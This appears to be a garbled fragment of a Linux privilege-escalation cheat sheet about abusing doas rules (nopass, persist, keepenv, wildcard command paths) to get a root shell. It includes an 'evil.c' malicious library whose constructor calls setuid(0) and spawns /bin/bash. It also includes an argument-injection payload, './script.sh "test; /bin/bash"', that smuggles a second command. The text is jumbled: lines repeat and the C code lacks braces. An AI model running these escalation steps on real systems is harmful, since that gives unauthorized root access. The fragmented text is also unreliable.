doas -s # or doas /bin/sh If the config allows a wildcard path, you might inject arguments.
permit nopass user1 as root cmd /usr/bin/* Try: hacktricks doas
// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash"); doas -s # or doas /bin/sh If the
./script.sh "test; /bin/bash" permit persist user1 as root Once you run doas -n id with password once, subsequent commands don’t need a password for a few minutes. __attribute__((constructor)) void init() setuid(0)
permit keepenv user1 as root Compile a malicious lib: